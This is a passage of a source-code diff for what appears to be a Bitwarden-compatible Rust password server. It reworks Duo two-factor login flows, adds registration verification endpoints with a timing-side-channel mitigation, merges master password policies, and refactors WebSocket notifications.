Some(TwoFactorType::Webauthn) => webauthn::validate_webauthn_login(&user.uuid, twofactor_code, conn).await?,
|
Some(TwoFactorType::Webauthn) => webauthn::validate_webauthn_login(&user.uuid, twofactor_code, conn).await?,
|
||||||
Some(TwoFactorType::YubiKey) => yubikey::validate_yubikey_login(twofactor_code, &selected_data?).await?,
|
Some(TwoFactorType::YubiKey) => yubikey::validate_yubikey_login(twofactor_code, &selected_data?).await?,
|
||||||
Some(TwoFactorType::Duo) => {
|
Some(TwoFactorType::Duo) => {
|
||||||
duo::validate_duo_login(data.username.as_ref().unwrap().trim(), twofactor_code, conn).await?
|
match CONFIG.duo_use_iframe() {
|
||||||
|
true => {
|
||||||
|
// Legacy iframe prompt flow
|
||||||
|
duo::validate_duo_login(&user.email, twofactor_code, conn).await?
|
||||||
|
}
|
||||||
|
false => {
|
||||||
|
// OIDC based flow
|
||||||
|
duo_oidc::validate_duo_login(
|
||||||
|
&user.email,
|
||||||
|
twofactor_code,
|
||||||
|
data.client_id.as_ref().unwrap(),
|
||||||
|
data.device_identifier.as_ref().unwrap(),
|
||||||
|
conn,
|
||||||
|
)
|
||||||
|
.await?
|
||||||
|
}
|
||||||
|
}
|
||||||
}
|
}
|
||||||
Some(TwoFactorType::Email) => {
|
Some(TwoFactorType::Email) => {
|
||||||
email::validate_email_code_str(&user.uuid, twofactor_code, &selected_data?, conn).await?
|
email::validate_email_code_str(&user.uuid, twofactor_code, &selected_data?, &ip.ip, conn).await?
|
||||||
}
|
}
|
||||||
|
|
||||||
Some(TwoFactorType::Remember) => {
|
Some(TwoFactorType::Remember) => {
|
||||||
@@ -527,7 +556,7 @@ async fn twofactor_auth(
|
|||||||
}
|
}
|
||||||
_ => {
|
_ => {
|
||||||
err_json!(
|
err_json!(
|
||||||
_json_err_twofactor(&twofactor_ids, &user.uuid, conn).await?,
|
_json_err_twofactor(&twofactor_ids, &user.uuid, data, client_version, conn).await?,
|
||||||
"2FA Remember token not provided"
|
"2FA Remember token not provided"
|
||||||
)
|
)
|
||||||
}
|
}
|
||||||
@@ -555,12 +584,21 @@ fn _selected_data(tf: Option<TwoFactor>) -> ApiResult<String> {
|
|||||||
tf.map(|t| t.data).map_res("Two factor doesn't exist")
|
tf.map(|t| t.data).map_res("Two factor doesn't exist")
|
||||||
}
|
}
|
||||||
|
|
||||||
async fn _json_err_twofactor(providers: &[i32], user_uuid: &str, conn: &mut DbConn) -> ApiResult<Value> {
|
async fn _json_err_twofactor(
|
||||||
|
providers: &[i32],
|
||||||
|
user_id: &UserId,
|
||||||
|
data: &ConnectData,
|
||||||
|
client_version: &Option<ClientVersion>,
|
||||||
|
conn: &mut DbConn,
|
||||||
|
) -> ApiResult<Value> {
|
||||||
let mut result = json!({
|
let mut result = json!({
|
||||||
"error" : "invalid_grant",
|
"error" : "invalid_grant",
|
||||||
"error_description" : "Two factor required.",
|
"error_description" : "Two factor required.",
|
||||||
"TwoFactorProviders" : providers,
|
"TwoFactorProviders" : providers.iter().map(ToString::to_string).collect::<Vec<String>>(),
|
||||||
"TwoFactorProviders2" : {} // { "0" : null }
|
"TwoFactorProviders2" : {}, // { "0" : null }
|
||||||
|
"MasterPasswordPolicy": {
|
||||||
|
"Object": "masterPasswordPolicy"
|
||||||
|
}
|
||||||
});
|
});
|
||||||
|
|
||||||
for provider in providers {
|
for provider in providers {
|
||||||
@@ -570,46 +608,70 @@ async fn _json_err_twofactor(providers: &[i32], user_uuid: &str, conn: &mut DbCo
|
|||||||
Some(TwoFactorType::Authenticator) => { /* Nothing to do for TOTP */ }
|
Some(TwoFactorType::Authenticator) => { /* Nothing to do for TOTP */ }
|
||||||
|
|
||||||
Some(TwoFactorType::Webauthn) if CONFIG.domain_set() => {
|
Some(TwoFactorType::Webauthn) if CONFIG.domain_set() => {
|
||||||
let request = webauthn::generate_webauthn_login(user_uuid, conn).await?;
|
let request = webauthn::generate_webauthn_login(user_id, conn).await?;
|
||||||
result["TwoFactorProviders2"][provider.to_string()] = request.0;
|
result["TwoFactorProviders2"][provider.to_string()] = request.0;
|
||||||
}
|
}
|
||||||
|
|
||||||
Some(TwoFactorType::Duo) => {
|
Some(TwoFactorType::Duo) => {
|
||||||
let email = match User::find_by_uuid(user_uuid, conn).await {
|
let email = match User::find_by_uuid(user_id, conn).await {
|
||||||
Some(u) => u.email,
|
Some(u) => u.email,
|
||||||
None => err!("User does not exist"),
|
None => err!("User does not exist"),
|
||||||
};
|
};
|
||||||
|
|
||||||
let (signature, host) = duo::generate_duo_signature(&email, conn).await?;
|
match CONFIG.duo_use_iframe() {
|
||||||
|
true => {
|
||||||
|
// Legacy iframe prompt flow
|
||||||
|
let (signature, host) = duo::generate_duo_signature(&email, conn).await?;
|
||||||
|
result["TwoFactorProviders2"][provider.to_string()] = json!({
|
||||||
|
"Host": host,
|
||||||
|
"Signature": signature,
|
||||||
|
})
|
||||||
|
}
|
||||||
|
false => {
|
||||||
|
// OIDC based flow
|
||||||
|
let auth_url = duo_oidc::get_duo_auth_url(
|
||||||
|
&email,
|
||||||
|
data.client_id.as_ref().unwrap(),
|
||||||
|
data.device_identifier.as_ref().unwrap(),
|
||||||
|
conn,
|
||||||
|
)
|
||||||
|
.await?;
|
||||||
|
|
||||||
result["TwoFactorProviders2"][provider.to_string()] = json!({
|
result["TwoFactorProviders2"][provider.to_string()] = json!({
|
||||||
"Host": host,
|
"AuthUrl": auth_url,
|
||||||
"Signature": signature,
|
})
|
||||||
});
|
}
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
Some(tf_type @ TwoFactorType::YubiKey) => {
|
Some(tf_type @ TwoFactorType::YubiKey) => {
|
||||||
let twofactor = match TwoFactor::find_by_user_and_type(user_uuid, tf_type as i32, conn).await {
|
let Some(twofactor) = TwoFactor::find_by_user_and_type(user_id, tf_type as i32, conn).await else {
|
||||||
Some(tf) => tf,
|
err!("No YubiKey devices registered")
|
||||||
None => err!("No YubiKey devices registered"),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
let yubikey_metadata: yubikey::YubikeyMetadata = serde_json::from_str(&twofactor.data)?;
|
let yubikey_metadata: yubikey::YubikeyMetadata = serde_json::from_str(&twofactor.data)?;
|
||||||
|
|
||||||
result["TwoFactorProviders2"][provider.to_string()] = json!({
|
result["TwoFactorProviders2"][provider.to_string()] = json!({
|
||||||
"Nfc": yubikey_metadata.Nfc,
|
"Nfc": yubikey_metadata.nfc,
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
|
|
||||||
Some(tf_type @ TwoFactorType::Email) => {
|
Some(tf_type @ TwoFactorType::Email) => {
|
||||||
let twofactor = match TwoFactor::find_by_user_and_type(user_uuid, tf_type as i32, conn).await {
|
let Some(twofactor) = TwoFactor::find_by_user_and_type(user_id, tf_type as i32, conn).await else {
|
||||||
Some(tf) => tf,
|
err!("No twofactor email registered")
|
||||||
None => err!("No twofactor email registered"),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
// Send email immediately if email is the only 2FA option
|
// Starting with version 2025.5.0 the client will call `/api/two-factor/send-email-login`.
|
||||||
if providers.len() == 1 {
|
let disabled_send = if let Some(cv) = client_version {
|
||||||
email::send_token(user_uuid, conn).await?
|
let ver_match = semver::VersionReq::parse(">=2025.5.0").unwrap();
|
||||||
|
ver_match.matches(&cv.0)
|
||||||
|
} else {
|
||||||
|
false
|
||||||
|
};
|
||||||
|
|
||||||
|
// Send email immediately if email is the only 2FA option.
|
||||||
|
if providers.len() == 1 && !disabled_send {
|
||||||
|
email::send_token(user_id, conn).await?
|
||||||
}
|
}
|
||||||
|
|
||||||
let email_data = email::EmailTokenData::from_json(&twofactor.data)?;
|
let email_data = email::EmailTokenData::from_json(&twofactor.data)?;
|
||||||
@@ -626,19 +688,80 @@ async fn _json_err_twofactor(providers: &[i32], user_uuid: &str, conn: &mut DbCo
|
|||||||
}
|
}
|
||||||
|
|
||||||
#[post("/accounts/prelogin", data = "<data>")]
|
#[post("/accounts/prelogin", data = "<data>")]
|
||||||
async fn prelogin(data: JsonUpcase<PreloginData>, conn: DbConn) -> Json<Value> {
|
async fn prelogin(data: Json<PreloginData>, conn: DbConn) -> Json<Value> {
|
||||||
_prelogin(data, conn).await
|
_prelogin(data, conn).await
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/accounts/register", data = "<data>")]
|
#[post("/accounts/register", data = "<data>")]
|
||||||
async fn identity_register(data: JsonUpcase<RegisterData>, conn: DbConn) -> JsonResult {
|
async fn identity_register(data: Json<RegisterData>, conn: DbConn) -> JsonResult {
|
||||||
_register(data, conn).await
|
_register(data, false, conn).await
|
||||||
|
}
|
||||||
|
|
||||||
|
#[derive(Debug, Deserialize)]
|
||||||
|
#[serde(rename_all = "camelCase")]
|
||||||
|
struct RegisterVerificationData {
|
||||||
|
email: String,
|
||||||
|
name: Option<String>,
|
||||||
|
// receiveMarketingEmails: bool,
|
||||||
|
}
|
||||||
|
|
||||||
|
#[derive(rocket::Responder)]
|
||||||
|
enum RegisterVerificationResponse {
|
||||||
|
NoContent(()),
|
||||||
|
Token(Json<String>),
|
||||||
|
}
|
||||||
|
|
||||||
|
#[post("/accounts/register/send-verification-email", data = "<data>")]
|
||||||
|
async fn register_verification_email(
|
||||||
|
data: Json<RegisterVerificationData>,
|
||||||
|
mut conn: DbConn,
|
||||||
|
) -> ApiResult<RegisterVerificationResponse> {
|
||||||
|
let data = data.into_inner();
|
||||||
|
|
||||||
|
// the registration can only continue if signup is allowed or there exists an invitation
|
||||||
|
if !(CONFIG.is_signup_allowed(&data.email)
|
||||||
|
|| (!CONFIG.mail_enabled() && Invitation::find_by_mail(&data.email, &mut conn).await.is_some()))
|
||||||
|
{
|
||||||
|
err!("Registration not allowed or user already exists")
|
||||||
|
}
|
||||||
|
|
||||||
|
let should_send_mail = CONFIG.mail_enabled() && CONFIG.signups_verify();
|
||||||
|
|
||||||
|
let token_claims =
|
||||||
|
crate::auth::generate_register_verify_claims(data.email.clone(), data.name.clone(), should_send_mail);
|
||||||
|
let token = crate::auth::encode_jwt(&token_claims);
|
||||||
|
|
||||||
|
if should_send_mail {
|
||||||
|
let user = User::find_by_mail(&data.email, &mut conn).await;
|
||||||
|
if user.filter(|u| u.private_key.is_some()).is_some() {
|
||||||
|
// There is still a timing side channel here in that the code
|
||||||
|
// paths that send mail take noticeably longer than ones that
|
||||||
|
// don't. Add a randomized sleep to mitigate this somewhat.
|
||||||
|
use rand::{rngs::SmallRng, Rng, SeedableRng};
|
||||||
|
let mut rng = SmallRng::from_os_rng();
|
||||||
|
let delta: i32 = 100;
|
||||||
|
let sleep_ms = (1_000 + rng.random_range(-delta..=delta)) as u64;
|
||||||
|
tokio::time::sleep(tokio::time::Duration::from_millis(sleep_ms)).await;
|
||||||
|
} else {
|
||||||
|
mail::send_register_verify_email(&data.email, &token).await?;
|
||||||
|
}
|
||||||
|
|
||||||
|
Ok(RegisterVerificationResponse::NoContent(()))
|
||||||
|
} else {
|
||||||
|
// If email verification is not required, return the token directly
|
||||||
|
// the clients will use this token to finish the registration
|
||||||
|
Ok(RegisterVerificationResponse::Token(Json(token)))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
#[post("/accounts/register/finish", data = "<data>")]
|
||||||
|
async fn register_finish(data: Json<RegisterData>, conn: DbConn) -> JsonResult {
|
||||||
|
_register(data, true, conn).await
|
||||||
}
|
}
|
||||||
|
|
||||||
// https://github.com/bitwarden/jslib/blob/master/common/src/models/request/tokenRequest.ts
|
// https://github.com/bitwarden/jslib/blob/master/common/src/models/request/tokenRequest.ts
|
||||||
// https://github.com/bitwarden/mobile/blob/master/src/Core/Models/Request/TokenRequest.cs
|
// https://github.com/bitwarden/mobile/blob/master/src/Core/Models/Request/TokenRequest.cs
|
||||||
#[derive(Debug, Clone, Default, FromForm)]
|
#[derive(Debug, Clone, Default, FromForm)]
|
||||||
#[allow(non_snake_case)]
|
|
||||||
struct ConnectData {
|
struct ConnectData {
|
||||||
#[field(name = uncased("grant_type"))]
|
#[field(name = uncased("grant_type"))]
|
||||||
#[field(name = uncased("granttype"))]
|
#[field(name = uncased("granttype"))]
|
||||||
@@ -665,7 +788,7 @@ struct ConnectData {
|
|||||||
|
|
||||||
#[field(name = uncased("device_identifier"))]
|
#[field(name = uncased("device_identifier"))]
|
||||||
#[field(name = uncased("deviceidentifier"))]
|
#[field(name = uncased("deviceidentifier"))]
|
||||||
device_identifier: Option<String>,
|
device_identifier: Option<DeviceId>,
|
||||||
#[field(name = uncased("device_name"))]
|
#[field(name = uncased("device_name"))]
|
||||||
#[field(name = uncased("devicename"))]
|
#[field(name = uncased("devicename"))]
|
||||||
device_name: Option<String>,
|
device_name: Option<String>,
|
||||||
@@ -688,7 +811,7 @@ struct ConnectData {
|
|||||||
#[field(name = uncased("twofactorremember"))]
|
#[field(name = uncased("twofactorremember"))]
|
||||||
two_factor_remember: Option<i32>,
|
two_factor_remember: Option<i32>,
|
||||||
#[field(name = uncased("authrequest"))]
|
#[field(name = uncased("authrequest"))]
|
||||||
auth_request: Option<String>,
|
auth_request: Option<AuthRequestId>,
|
||||||
}
|
}
|
||||||
|
|
||||||
fn _check_is_some<T>(value: &Option<T>, msg: &str) -> EmptyResult {
|
fn _check_is_some<T>(value: &Option<T>, msg: &str) -> EmptyResult {
|
||||||
|
|||||||
@@ -23,7 +23,7 @@ pub use crate::api::{
|
|||||||
icons::routes as icons_routes,
|
icons::routes as icons_routes,
|
||||||
identity::routes as identity_routes,
|
identity::routes as identity_routes,
|
||||||
notifications::routes as notifications_routes,
|
notifications::routes as notifications_routes,
|
||||||
notifications::{start_notification_server, AnonymousNotify, Notify, UpdateType, WS_ANONYMOUS_SUBSCRIPTIONS},
|
notifications::{AnonymousNotify, Notify, UpdateType, WS_ANONYMOUS_SUBSCRIPTIONS, WS_USERS},
|
||||||
push::{
|
push::{
|
||||||
push_cipher_update, push_folder_update, push_logout, push_send_update, push_user_update, register_push_device,
|
push_cipher_update, push_folder_update, push_logout, push_send_update, push_user_update, register_push_device,
|
||||||
unregister_push_device,
|
unregister_push_device,
|
||||||
@@ -32,24 +32,22 @@ pub use crate::api::{
|
|||||||
web::routes as web_routes,
|
web::routes as web_routes,
|
||||||
web::static_files,
|
web::static_files,
|
||||||
};
|
};
|
||||||
use crate::db::{models::User, DbConn};
|
use crate::db::{
|
||||||
use crate::util;
|
models::{OrgPolicy, OrgPolicyType, User},
|
||||||
|
DbConn,
|
||||||
|
};
|
||||||
|
|
||||||
// Type aliases for API methods results
|
// Type aliases for API methods results
|
||||||
type ApiResult<T> = Result<T, crate::error::Error>;
|
type ApiResult<T> = Result<T, crate::error::Error>;
|
||||||
pub type JsonResult = ApiResult<Json<Value>>;
|
pub type JsonResult = ApiResult<Json<Value>>;
|
||||||
pub type EmptyResult = ApiResult<()>;
|
pub type EmptyResult = ApiResult<()>;
|
||||||
|
|
||||||
type JsonUpcase<T> = Json<util::UpCase<T>>;
|
|
||||||
type JsonUpcaseVec<T> = Json<Vec<util::UpCase<T>>>;
|
|
||||||
type JsonVec<T> = Json<Vec<T>>;
|
|
||||||
|
|
||||||
// Common structs representing JSON data received
|
// Common structs representing JSON data received
|
||||||
#[derive(Deserialize)]
|
#[derive(Deserialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
struct PasswordOrOtpData {
|
struct PasswordOrOtpData {
|
||||||
MasterPasswordHash: Option<String>,
|
master_password_hash: Option<String>,
|
||||||
Otp: Option<String>,
|
otp: Option<String>,
|
||||||
}
|
}
|
||||||
|
|
||||||
impl PasswordOrOtpData {
|
impl PasswordOrOtpData {
|
||||||
@@ -59,7 +57,7 @@ impl PasswordOrOtpData {
|
|||||||
pub async fn validate(&self, user: &User, delete_if_valid: bool, conn: &mut DbConn) -> EmptyResult {
|
pub async fn validate(&self, user: &User, delete_if_valid: bool, conn: &mut DbConn) -> EmptyResult {
|
||||||
use crate::api::core::two_factor::protected_actions::validate_protected_action_otp;
|
use crate::api::core::two_factor::protected_actions::validate_protected_action_otp;
|
||||||
|
|
||||||
match (self.MasterPasswordHash.as_deref(), self.Otp.as_deref()) {
|
match (self.master_password_hash.as_deref(), self.otp.as_deref()) {
|
||||||
(Some(pw_hash), None) => {
|
(Some(pw_hash), None) => {
|
||||||
if !user.check_valid_password(pw_hash) {
|
if !user.check_valid_password(pw_hash) {
|
||||||
err!("Invalid password");
|
err!("Invalid password");
|
||||||
@@ -73,3 +71,49 @@ impl PasswordOrOtpData {
|
|||||||
Ok(())
|
Ok(())
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
#[derive(Debug, Default, Deserialize, Serialize)]
|
||||||
|
#[serde(rename_all = "camelCase")]
|
||||||
|
pub struct MasterPasswordPolicy {
|
||||||
|
min_complexity: Option<u8>,
|
||||||
|
min_length: Option<u32>,
|
||||||
|
require_lower: bool,
|
||||||
|
require_upper: bool,
|
||||||
|
require_numbers: bool,
|
||||||
|
require_special: bool,
|
||||||
|
enforce_on_login: bool,
|
||||||
|
}
|
||||||
|
|
||||||
|
// Fetch all valid Master Password Policies and merge them into one with all trues and largest numbers as one policy
|
||||||
|
async fn master_password_policy(user: &User, conn: &DbConn) -> Value {
|
||||||
|
let master_password_policies: Vec<MasterPasswordPolicy> =
|
||||||
|
OrgPolicy::find_accepted_and_confirmed_by_user_and_active_policy(
|
||||||
|
&user.uuid,
|
||||||
|
OrgPolicyType::MasterPassword,
|
||||||
|
conn,
|
||||||
|
)
|
||||||
|
.await
|
||||||
|
.into_iter()
|
||||||
|
.filter_map(|p| serde_json::from_str(&p.data).ok())
|
||||||
|
.collect();
|
||||||
|
|
||||||
|
let mut mpp_json = if !master_password_policies.is_empty() {
|
||||||
|
json!(master_password_policies.into_iter().reduce(|acc, policy| {
|
||||||
|
MasterPasswordPolicy {
|
||||||
|
min_complexity: acc.min_complexity.max(policy.min_complexity),
|
||||||
|
min_length: acc.min_length.max(policy.min_length),
|
||||||
|
require_lower: acc.require_lower || policy.require_lower,
|
||||||
|
require_upper: acc.require_upper || policy.require_upper,
|
||||||
|
require_numbers: acc.require_numbers || policy.require_numbers,
|
||||||
|
require_special: acc.require_special || policy.require_special,
|
||||||
|
enforce_on_login: acc.enforce_on_login || policy.enforce_on_login,
|
||||||
|
}
|
||||||
|
}))
|
||||||
|
} else {
|
||||||
|
json!({})
|
||||||
|
};
|
||||||
|
|
||||||
|
// NOTE: Upstream still uses PascalCase here for `Object`!
|
||||||
|
mpp_json["Object"] = json!("masterPasswordPolicy");
|
||||||
|
mpp_json
|
||||||
|
}
|
||||||
|
|||||||
@@ -1,28 +1,16 @@
|
|||||||
use std::{
|
use std::{net::IpAddr, sync::Arc, time::Duration};
|
||||||
net::{IpAddr, SocketAddr},
|
|
||||||
sync::Arc,
|
|
||||||
time::Duration,
|
|
||||||
};
|
|
||||||
|
|
||||||
use chrono::{NaiveDateTime, Utc};
|
use chrono::{NaiveDateTime, Utc};
|
||||||
use rmpv::Value;
|
use rmpv::Value;
|
||||||
use rocket::{
|
use rocket::{futures::StreamExt, Route};
|
||||||
futures::{SinkExt, StreamExt},
|
use tokio::sync::mpsc::Sender;
|
||||||
Route,
|
|
||||||
};
|
use rocket_ws::{Message, WebSocket};
|
||||||
use tokio::{
|
|
||||||
net::{TcpListener, TcpStream},
|
|
||||||
sync::mpsc::Sender,
|
|
||||||
};
|
|
||||||
use tokio_tungstenite::{
|
|
||||||
accept_hdr_async,
|
|
||||||
tungstenite::{handshake, Message},
|
|
||||||
};
|
|
||||||
|
|
||||||
use crate::{
|
use crate::{
|
||||||
auth::{ClientIp, WsAccessTokenHeader},
|
auth::{ClientIp, WsAccessTokenHeader},
|
||||||
db::{
|
db::{
|
||||||
models::{Cipher, Folder, Send as DbSend, User},
|
models::{AuthRequestId, Cipher, CollectionId, Device, DeviceId, Folder, PushId, Send as DbSend, User, UserId},
|
||||||
DbConn,
|
DbConn,
|
||||||
},
|
},
|
||||||
Error, CONFIG,
|
Error, CONFIG,
|
||||||
@@ -30,7 +18,7 @@ use crate::{
|
|||||||
|
|
||||||
use once_cell::sync::Lazy;
|
use once_cell::sync::Lazy;
|
||||||
|
|
||||||
static WS_USERS: Lazy<Arc<WebSocketUsers>> = Lazy::new(|| {
|
pub static WS_USERS: Lazy<Arc<WebSocketUsers>> = Lazy::new(|| {
|
||||||
Arc::new(WebSocketUsers {
|
Arc::new(WebSocketUsers {
|
||||||
map: Arc::new(dashmap::DashMap::new()),
|
map: Arc::new(dashmap::DashMap::new()),
|
||||||
})
|
})
|
||||||
@@ -47,8 +35,15 @@ use super::{
|
|||||||
push_send_update, push_user_update,
|
push_send_update, push_user_update,
|
||||||
};
|
};
|
||||||
|
|
||||||
|
static NOTIFICATIONS_DISABLED: Lazy<bool> = Lazy::new(|| !CONFIG.enable_websocket() && !CONFIG.push_enabled());
|
||||||
|
|
||||||
pub fn routes() -> Vec<Route> {
|
pub fn routes() -> Vec<Route> {
|
||||||
routes![websockets_hub, anonymous_websockets_hub]
|
if CONFIG.enable_websocket() {
|
||||||
|
routes![websockets_hub, anonymous_websockets_hub]
|
||||||
|
} else {
|
||||||
|
info!("WebSocket are disabled, realtime sync functionality will not work!");
|
||||||
|
routes![]
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
#[derive(FromForm, Debug)]
|
#[derive(FromForm, Debug)]
|
||||||
@@ -58,13 +53,13 @@ struct WsAccessToken {
|
|||||||
|
|
||||||
struct WSEntryMapGuard {
|
struct WSEntryMapGuard {
|
||||||
users: Arc<WebSocketUsers>,
|
users: Arc<WebSocketUsers>,
|
||||||
user_uuid: String,
|
user_uuid: UserId,
|
||||||
entry_uuid: uuid::Uuid,
|
entry_uuid: uuid::Uuid,
|
||||||
addr: IpAddr,
|
addr: IpAddr,
|
||||||
}
|
}
|
||||||
|
|
||||||
impl WSEntryMapGuard {
|
impl WSEntryMapGuard {
|
||||||
fn new(users: Arc<WebSocketUsers>, user_uuid: String, entry_uuid: uuid::Uuid, addr: IpAddr) -> Self {
|
fn new(users: Arc<WebSocketUsers>, user_uuid: UserId, entry_uuid: uuid::Uuid, addr: IpAddr) -> Self {
|
||||||
Self {
|
Self {
|
||||||
users,
|
users,
|
||||||
user_uuid,
|
user_uuid,
|
||||||
@@ -77,7 +72,7 @@ impl WSEntryMapGuard {
|
|||||||
impl Drop for WSEntryMapGuard {
|
impl Drop for WSEntryMapGuard {
|
||||||
fn drop(&mut self) {
|
fn drop(&mut self) {
|
||||||
info!("Closing WS connection from {}", self.addr);
|
info!("Closing WS connection from {}", self.addr);
|
||||||
if let Some(mut entry) = self.users.map.get_mut(&self.user_uuid) {
|
if let Some(mut entry) = self.users.map.get_mut(self.user_uuid.as_ref()) {
|
||||||
entry.retain(|(uuid, _)| uuid != &self.entry_uuid);
|
entry.retain(|(uuid, _)| uuid != &self.entry_uuid);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -106,9 +101,10 @@ impl Drop for WSAnonymousEntryMapGuard {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
#[allow(tail_expr_drop_order)]
|
||||||
#[get("/hub?<data..>")]
|
#[get("/hub?<data..>")]
|
||||||
fn websockets_hub<'r>(
|
fn websockets_hub<'r>(
|
||||||
ws: rocket_ws::WebSocket,
|
ws: WebSocket,
|
||||||
data: WsAccessToken,
|
data: WsAccessToken,
|
||||||
ip: ClientIp,
|
ip: ClientIp,
|
||||||
header_token: WsAccessTokenHeader,
|
header_token: WsAccessTokenHeader,
|
||||||
@@ -134,7 +130,7 @@ fn websockets_hub<'r>(
|
|||||||
// Add a channel to send messages to this client to the map
|
// Add a channel to send messages to this client to the map
|
||||||
let entry_uuid = uuid::Uuid::new_v4();
|
let entry_uuid = uuid::Uuid::new_v4();
|
||||||
let (tx, rx) = tokio::sync::mpsc::channel::<Message>(100);
|
let (tx, rx) = tokio::sync::mpsc::channel::<Message>(100);
|
||||||
users.map.entry(claims.sub.clone()).or_default().push((entry_uuid, tx));
|
users.map.entry(claims.sub.to_string()).or_default().push((entry_uuid, tx));
|
||||||
|
|
||||||
// Once the guard goes out of scope, the connection will have been closed and the entry will be deleted from the map
|
// Once the guard goes out of scope, the connection will have been closed and the entry will be deleted from the map
|
||||||
(rx, WSEntryMapGuard::new(users, claims.sub, entry_uuid, addr))
|
(rx, WSEntryMapGuard::new(users, claims.sub, entry_uuid, addr))
|
||||||
@@ -161,7 +157,6 @@ fn websockets_hub<'r>(
|
|||||||
|
|
||||||
if serde_json::from_str(msg).ok() == Some(INITIAL_MESSAGE) {
|
if serde_json::from_str(msg).ok() == Some(INITIAL_MESSAGE) {
|
||||||
yield Message::binary(INITIAL_RESPONSE);
|
yield Message::binary(INITIAL_RESPONSE);
|
||||||
continue;
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -191,12 +186,9 @@ fn websockets_hub<'r>(
|
|||||||
})
|
})
|
||||||
}
|
}
|
||||||
|
|
||||||
|
#[allow(tail_expr_drop_order)]
|
||||||
#[get("/anonymous-hub?<token..>")]
|
#[get("/anonymous-hub?<token..>")]
|
||||||
fn anonymous_websockets_hub<'r>(
|
fn anonymous_websockets_hub<'r>(ws: WebSocket, token: String, ip: ClientIp) -> Result<rocket_ws::Stream!['r], Error> {
|
||||||
ws: rocket_ws::WebSocket,
|
|
||||||
token: String,
|
|
||||||
ip: ClientIp,
|
|
||||||
) -> Result<rocket_ws::Stream!['r], Error> {
|
|
||||||
let addr = ip.ip;
|
let addr = ip.ip;
|
||||||
info!("Accepting Anonymous Rocket WS connection from {addr}");
|
info!("Accepting Anonymous Rocket WS connection from {addr}");
|
||||||
|
|
||||||
@@ -232,7 +224,6 @@ fn anonymous_websockets_hub<'r>(
|
|||||||
|
|
||||||
if serde_json::from_str(msg).ok() == Some(INITIAL_MESSAGE) {
|
if serde_json::from_str(msg).ok() == Some(INITIAL_MESSAGE) {
|
||||||
yield Message::binary(INITIAL_RESPONSE);
|
yield Message::binary(INITIAL_RESPONSE);
|
||||||
continue;
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -297,9 +288,9 @@ fn serialize(val: Value) -> Vec<u8> {
|
|||||||
}
|
}
|
||||||
|
|
||||||
fn serialize_date(date: NaiveDateTime) -> Value {
|
fn serialize_date(date: NaiveDateTime) -> Value {
|
||||||
let seconds: i64 = date.timestamp();
|
let seconds: i64 = date.and_utc().timestamp();
|
||||||
let nanos: i64 = date.timestamp_subsec_nanos().into();
|
let nanos: i64 = date.and_utc().timestamp_subsec_nanos().into();
|
||||||
let timestamp = nanos << 34 | seconds;
|
let timestamp = (nanos << 34) | seconds;
|
||||||
|
|
||||||
let bs = timestamp.to_be_bytes();
|
let bs = timestamp.to_be_bytes();
|
||||||
|
|
||||||
@@ -337,8 +328,8 @@ pub struct WebSocketUsers {
|
|||||||
}
|
}
|
||||||
|
|
||||||
impl WebSocketUsers {
|
impl WebSocketUsers {
|
||||||
async fn send_update(&self, user_uuid: &str, data: &[u8]) {
|
async fn send_update(&self, user_id: &UserId, data: &[u8]) {
|
||||||
if let Some(user) = self.map.get(user_uuid).map(|v| v.clone()) {
|
if let Some(user) = self.map.get(user_id.as_ref()).map(|v| v.clone()) {
|
||||||
for (_, sender) in user.iter() {
|
for (_, sender) in user.iter() {
|
||||||
if let Err(e) = sender.send(Message::binary(data)).await {
|
if let Err(e) = sender.send(Message::binary(data)).await {
|
||||||
error!("Error sending WS update {e}");
|
error!("Error sending WS update {e}");
|
||||||
@@ -348,55 +339,67 @@ impl WebSocketUsers {
|
|||||||
}
|
}
|
||||||
|
|
||||||
// NOTE: The last modified date needs to be updated before calling these methods
|
// NOTE: The last modified date needs to be updated before calling these methods
|
||||||
pub async fn send_user_update(&self, ut: UpdateType, user: &User) {
|
pub async fn send_user_update(&self, ut: UpdateType, user: &User, push_uuid: &Option<PushId>, conn: &mut DbConn) {
|
||||||
|
// Skip any processing if both WebSockets and Push are not active
|
||||||
|
if *NOTIFICATIONS_DISABLED {
|
||||||
|
return;
|
||||||
|
}
|
||||||
let data = create_update(
|
let data = create_update(
|
||||||
vec![("UserId".into(), user.uuid.clone().into()), ("Date".into(), serialize_date(user.updated_at))],
|
vec![("UserId".into(), user.uuid.to_string().into()), ("Date".into(), serialize_date(user.updated_at))],
|
||||||
ut,
|
ut,
|
||||||
None,
|
None,
|
||||||
);
|
);
|
||||||
|
|
||||||
self.send_update(&user.uuid, &data).await;
|
if CONFIG.enable_websocket() {
|
||||||
|
self.send_update(&user.uuid, &data).await;
|
||||||
|
}
|
||||||
|
|
||||||
if CONFIG.push_enabled() {
|
if CONFIG.push_enabled() {
|
||||||
push_user_update(ut, user);
|
push_user_update(ut, user, push_uuid, conn).await;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn send_logout(&self, user: &User, acting_device_uuid: Option<String>) {
|
pub async fn send_logout(&self, user: &User, acting_device_id: Option<DeviceId>, conn: &mut DbConn) {
|
||||||
|
// Skip any processing if both WebSockets and Push are not active
|
||||||
|
if *NOTIFICATIONS_DISABLED {
|
||||||
|
return;
|
||||||
|
}
|
||||||
let data = create_update(
|
let data = create_update(
|
||||||
vec![("UserId".into(), user.uuid.clone().into()), ("Date".into(), serialize_date(user.updated_at))],
|
vec![("UserId".into(), user.uuid.to_string().into()), ("Date".into(), serialize_date(user.updated_at))],
|
||||||
UpdateType::LogOut,
|
UpdateType::LogOut,
|
||||||
acting_device_uuid.clone(),
|
acting_device_id.clone(),
|
||||||
);
|
);
|
||||||
|
|
||||||
self.send_update(&user.uuid, &data).await;
|
